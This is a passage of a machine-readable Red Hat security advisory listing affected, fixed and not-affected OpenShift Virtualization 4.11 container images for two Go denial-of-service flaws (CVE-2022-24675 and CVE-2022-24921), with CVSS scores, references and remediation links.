"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-24675", }, { category: "external", summary: "RHBZ#2077688", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2077688", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-24675", url: "https://www.cve.org/CVERecord?id=CVE-2022-24675", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-24675", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-24675", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/oecdBNLOml8", url: "https://groups.google.com/g/golang-announce/c/oecdBNLOml8", }, ], release_date: "2022-04-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: encoding/pem: fix stack overflow in Decode", }, { cve: "CVE-2022-24921", cwe: { id: "CWE-400", name: "Uncontrolled Resource Consumption", }, discovery_date: "2022-03-16T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2064857", }, ], notes: [ { category: "description", text: "A stack overflow flaw was found in Golang's regexp module, which can crash the runtime if the application using regexp accepts very long or arbitrarily long regexps from untrusted sources that have sufficient nesting depths. To exploit this vulnerability, an attacker would need to send large regexps with deep nesting to the application. Triggering this flaw leads to a crash of the runtime, which causes a denial of service.", title: "Vulnerability description", }, { category: "summary", text: "golang: regexp: stack exhaustion via a deeply nested expression", title: "Vulnerability summary", }, { category: "other", text: "This flaw has been rated as a Moderate impact flaw because the exploitation of this flaw requires that an affected application accept arbitrarily long regexps from untrusted sources, which has inherent risks (even without this flaw), especially involving impacts to application availability.\n\nWithin regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-400: Uncontrolled Resource Consumption vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nRed Hat restricts access to all platform information by default, granting access only after successful hard token-based multi-factor authentication (MFA) and enforcing least privilege to ensure only authorized roles can execute or modify code. The environment employs malicious code protections, including IDS/IPS and antimalware tools to detect threats and monitor resource usage, helping prevent uncontrolled consumption that could lead to system failure. Additional safeguards, such as web application firewalls and load-balancing strategies, protect against resource exhaustion and performance degradation. Event logs are centrally collected, correlated, and analyzed to support monitoring, alerting, and retention, aiding in the detection of abnormal behavior and potential denial-of-service (DoS) conditions. Static code analysis and peer reviews enforce strong input validation and error handling, reducing the likelihood of input-based DoS attacks.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", 